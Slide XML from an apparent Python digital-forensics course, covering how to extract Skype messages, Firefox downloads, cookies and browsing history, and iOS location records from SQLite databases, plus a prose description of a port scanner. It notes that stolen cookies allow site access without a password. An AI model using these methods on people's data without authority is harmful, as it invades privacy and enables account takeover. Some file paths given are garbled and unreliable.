        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1117" name="Google Shape;1117;p65"/>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6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Using python and sqlite3 to automate Skype Database for Queries </a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p66"/>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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>We can also display user message that is stored in table named "message" by combining this table with the "conversations" table. The "message" table contains information about the author and dialog_partner of each message. By joining these two tables, we can determine if the author of the message is the same as the dialog_partner. If the author is different from the dialog_partner, then the owner of the database initiated the message to the dialog_partner. If the author is the same as the dialog_partner, then the dialog_partner initiated the message and it will print the dialog partner.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is important to note that when working with multiple tables in a SQLite database, it is important to use the appropriate join type to ensure that the data is combined correctly. And also that the structure and the content of the DB is known, to prevent data loss or errors.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p66"/>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6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Parsing Firefox Sqlite3 Database with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p67"/>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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Firefox, like many other applications, uses a SQLite database to store information on the user's device. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The location of the Firefox database is different depending on the operating system. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>On Windows, the database can be found in the C:\Documents and Settings&lt;User&gt;\Application Data\Mozilla\Firefox\Profiles&lt;Profile folder&gt; directory. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>On Mac OS X, the database can be found in the /Users/&lt;User&gt;./Library/Application\Support\Firefox\Profiles&lt;Profile folder&gt; directory.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p67"/>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6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Parsing Firefox Sqlite3 Database with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137" name="Google Shape;1137;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336873"/>
            <a:ext cx="11169172" cy="35994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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Firefox stores a lot of data in its databases, such as browsing history, bookmarks, and cookies. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>One database of particular interest is the "downloads.sqlite" database, which stores information about files that have been downloaded using the browser.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> This database contains information such as the file name, location, and download status.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>A Python script can be written to establish a connection to the "downloads.sqlite" database and execute SQL queries to extract information from the database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The script can then use the results of the queries to display the information in an appropriate manner, such as a list of downloaded files.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p68"/>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6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sz="3500"/>
              <a:t>Parsing Firefox Sqlite3 Database with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p69"/>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Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In Unix-based operating systems, such as Linux, Firefox stores timestamps in a different format. Instead of using a traditional timestamp, Firefox multiplies the number of seconds since January 1st, 1970 by 1,000,000. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This means that in order to convert the timestamp to a more readable format, we need to divide it by 1 million.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Cookies are used by Firefox to maintain state, such as keeping a user logged in to a website. Cookies can be used by investigators to access a website even if they don't have the password. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This is because cookies allow the browser to maintain state and avoid repetitive login processes, whereas the HTTP protocol lacks stateful design.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p69"/>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7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sz="3500"/>
              <a:t>Parsing Firefox Sqlite3 Database with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p70"/>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Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The cookies of Firefox are stored in a database named "cookies.sqlite". This database contains information about the cookies, such as the name, value, and expiration date. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>A Python script can be written to extract information from this database by establishing a connection to the "cookies.sqlite" and running SQL queries.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p70"/>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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680324" y="2336875"/>
            <a:ext cx="11206875" cy="4393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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>When investigating a target, an investigator may want to enumerate the target's browser history. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In Firefox, this information is stored in a database named "places.sqlite". </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The "moz_places" table in this database contains valuable information such as the date and address of websites that the user has visited.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Using wildcards in local history search can also be useful for investigations. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>For example, search history is often in the form of "q= followed by an &amp;", which indicates that the last history is a Google search.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p7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Parsing Firefox Sqlite3 Database with Python Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p71"/>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e9adf94182_2_72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="8596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BUILDING A PORT SCANNER CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;g1e9adf94182_2_72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581184" y="3043171"/>
            <a:ext cx="10490400" cy="3599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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The passage describes the functionality of the portScan function within the script. The portScan function takes two arguments, the hostname and target ports. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It begins by using the gethostbyname() function to attempt to resolve the hostname to a friendly hostname. Next, it will print the hostname (or IP address) and then loops through each individual port specified by the user, attempting to connect to each one using the connScan function. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The connScan function takes two arguments, tgtHost and tgtPort and attempts to create a connection to the target host and port. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If it is successful in creating a connection, it will print a message indicating that the port is open. If it is unsuccessful, it will print a message indicating that the port is closed.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;g1e9adf94182_2_72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707011" y="2310639"/>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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680324" y="2336875"/>
            <a:ext cx="11206875" cy="4393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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It's a good practice to use the os library when working with paths in different operating systems. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The os.path.join function allows you to combine paths in a cross-platform way, avoiding issues with different file slashes direction. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>For example, instead of using "downloadDb = Pathname + \downloads.sqlite", use "downloadDB = os.path.join(Pathname,”downloads.sqlite”)". </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This allows you to create an operating system-independent script that will work on different types of operating systems, such as Windows, Linux, and Mac OS.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p7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Parsing Firefox Sqlite3 Database with Python Contd..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p72"/>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7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Investigating ITUNES mobile backups with python Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2336873"/>
            <a:ext cx="11206879" cy="35994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Font typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Apple's iOS operating system has been found to track and record GPS coordinates in a database called "consolidated.db". </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The database contains a "Cell-location" column that stores the GPS points. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>This data is used by the operating system to provide better service by targeting the nearest tower, but it can also be used for malicious tracking of a user's movements. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>The data can also be used to record and backup movements to other devices.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In the past, Apple has removed the functionality of location-recording information from the iOS operating system, but some researchers have discovered that the data still remains in the consolidated.db. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
